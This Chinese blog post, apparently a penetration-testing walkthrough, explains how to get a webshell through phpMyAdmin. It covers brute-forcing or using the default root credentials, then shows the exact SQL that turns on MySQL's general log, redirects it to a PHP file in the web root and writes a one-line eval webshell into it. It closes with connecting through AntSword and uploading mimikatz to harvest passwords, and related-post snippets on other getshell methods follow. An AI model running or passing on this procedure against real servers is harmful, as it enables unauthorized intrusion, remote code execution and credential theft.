通过写入日志phpmyadmin getshell

已于 2023-06-25 09:39:15 修改
阅读量135 收藏
点赞数
文章标签: web
于 2023-04-14 09:10:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60894143/article/details/130145383
版权

 php版本5.4.45

默认账号密码都是root

常规思路应该是运用工具进行爆破

 获得账号密码

进入phpmyadmin

这里可以通过phpinfo.php文件查看网站路径

select @@basedir可以看到mysql所在的绝对路径

 ​编辑

检测全局变量

show variables like "gener%";

general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。

general log file 指的是日志的保存路径

 

 由图可知general_log默认关闭,以及日志的存储路径 

set global general_log = "on";

开启日志配置

 set global general_log_file="E:/phpstudy/www/shell.php";

 设置日志路径

 写入成功

写入一句话到日志里

再次访问

因为开启了日志记录功能,所执行的sql语句都会被记录在日志中

select '<?php eval($_POST[cmd]);?>'

直接执行这句话也可以

两者皆可

直接用蚁剑连接

getshell成功 ​编辑

 ​编辑

之后就可以上传mimikatz获取密码

C9ccc00
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
记一次tp5.0.24 getshell1
08-03
"记一次tp5.0.24 getshell" 在这篇文章中,我们将探讨一个关于TP5.0.24版本的getshell漏洞的记录。TP5.0.24是ThinkPHP框架的其中一个版本,该框架是一种流行的PHP开发框架。 首先,我们需要了解TP5.0.24的特点。TP...
【网络安全】日志注入getshell
等风来
12-26 2320
中间件的日志文件通常用于保存网站的访问记录,其中包括了客户端发送的HTTP请求行、User-Agent、Referer等信息。这些日志文件对于网站的运维和安全分析非常有用。如果能够在HTTP请求中插入恶意代码,那么这些恶意代码就会被保存到日志文件中。当访问日志文件时,其中的恶意代码可能会被执行
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2269
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
小白看完都学会了!查看mysql日志命令_phpmyadmin mysql查看数据库日志命令
2401_83977626的博客
05-13 258
小编在这里分享些我自己平时的学习资料,由于篇幅限制,pdf文档的详解资料太全面,细节内容实在太多啦,所以只把部分知识点截图出来粗略的介绍,每个小节点里面都有更细化的内容!开源分享:【一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码】程序员代码面试指南 IT名企算法与数据结构题目最优解这是” 本程序员面试宝典!书中对IT名企代码面试各类题目的最优解进行了总结,并提供了相关代码实现。
mysql开启查询日志记录执行语句和phpmyadmin界面展示
weixin_36667844的博客
02-08 405
查看phpMyAdmin,查看数据库情况(自己去操作)找到mysql 的配置文件 my.ini。找到mysql 的配置文件 my.ini。如图我配置到G盘底下的query.log。重启查看G:\\query.log。
phpmyadmin(mysql) 删除操作日志 Windows环境
zhangxy
10-05 769
phpmyadmin相关安装目录中 logs/mysql_log.log 文件。 这个文件会随数据的增加变得越来越大,可以在环境配置中修改自动清除日志,我这里讲手动,因为自动的话怕数据出错。下载一个专门可以打开log文件格式的软件(点击进入下载:https://www.jb51.net/softs/176101.html),点击LogView.exe,点击工具栏(文件——清除日志即可) ...
phpmyadmin日志文件拿weshell
weixin_51692662的博客
09-22 955
phpmyadminshell
phpMyAdmin通过密码漏洞留后门文件
10-17
今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞留后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
phpMyAdmin 5.2.1 (多语言版)
08-01
10. **日志和审计**:phpMyAdmin 5.2.1 提供了详细的日志记录,帮助管理员追踪数据库活动,以便进行问题排查和审计。 在解压缩"phpMyAdmin-5.2.1-all-languages"后,你会得到一个包含所有语言文件的完整安装包,...
pma:在Laravel Homestead盒子上安装phpMyAdmin的简单shell脚本
02-04
在本教程中,我们将详细讨论如何在Laravel Homestead上安装和配置phpMyAdmin,这将通过一个简单的shell脚本来实现。 首先,让我们了解Laravel Homestead。它是基于Vagrant和VirtualBox的,允许开发者在虚拟机中运行...
phpMyAdmin
08-18
phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
PhpMyadmin--getshell
qq_64664156的博客
09-20 353
phpMyAdmin通过MySQL日志文件getshell
第一章 phpmyadmin日志一句话写入
zhoess的博客
12-29 481
phpmyadmin 使用日志一句话写入getshell
日志getshell
weixin_54252904的博客
04-23 377
phpmyadmin日志getshell设置日志文件上传一句话木马查看是否成功蚁剑或菜刀getshellgetshell成功 在进入别人的phpmyadmin数据库后可以采用日志getshell 具体过程如下 设置日志文件 设置general_log = ON general_log_file = 网站根目录的php文件 上传一句话木马 执行sql语句 密码为cmd 查看是否成功 找到上传的地址 蚁剑或菜刀getshell getshell成功 最后可使用反弹shel
SQL手工注入之getshell
qq_43998932的博客
08-18 2922
第一次写文章,内容有些简单,大佬们轻喷。。 SQL注入简介 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。 SQL注入方式 SQL注入有手工注入和工具注入两种方式,本文为手工注入,手工注入可以更好的理解注入原理,从而在使用工具注入时知道工具做了些什么。 测试环境 可以自行使用虚拟机搭建靶场,安装phpStu
shell 写入文件_phpMyAdmin利用日志文件GetSHELL
weixin_35583709的博客
01-24 463
phpMyAdmin简介phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。GetSHELL前提1、phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可写权限2、MySQL版本大于5.0,MySQL 5.0版本...
GETSHELL学习总结
weixin_44508748的博客
06-29 4475
分类 带有漏洞的应用 redis 、tomcat、解析漏洞、编辑器、FTP 常规漏洞 sql注入、上传、文件包含、命令执行、Struts2、代码反序列化 后台拿shell 上传、数据库备份、配置插马 关于各种带有漏洞的应用以及OWASP Top10常规漏洞需要不断的积累,打造自己的核心的知识库,道路且长。本文仅记录最近对常见cms后台getshell的学习总结 网站getshell方法 1.数据库备份拿shell 如果网站后台具有数据库备份功能,可以将webshell格式先修改为允许上传的文件格式如jpg,
phpmyadmin通过日志文件拿webshell
aiquan9342的博客
03-26 475
该方法非原创。只是给大家分享一下姿势。如果知道得就当复习了,不知道得就捣鼓捣鼓。 前提:条件是root用户。 思路:就是利用mysql的一个日志文件。这个日志文件每执行一个sql语句就会将其执行的保存。我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令。然后执行菜刀连接之! 要先把general log设置为ON 然后将文件修改日志文件名修...
shell脚本安装phpmyadmin
最新发布
06-02
- Debian/Ubuntu:apt-get install phpmyadmin - CentOS/Fedora:yum install phpMyAdmin 5.在安装期间,你可能会被要求输入mysql数据库管理员的用户名和密码。如果你还没有设置它们,请先在mysql中设置一个管理员...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C9ccc00

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值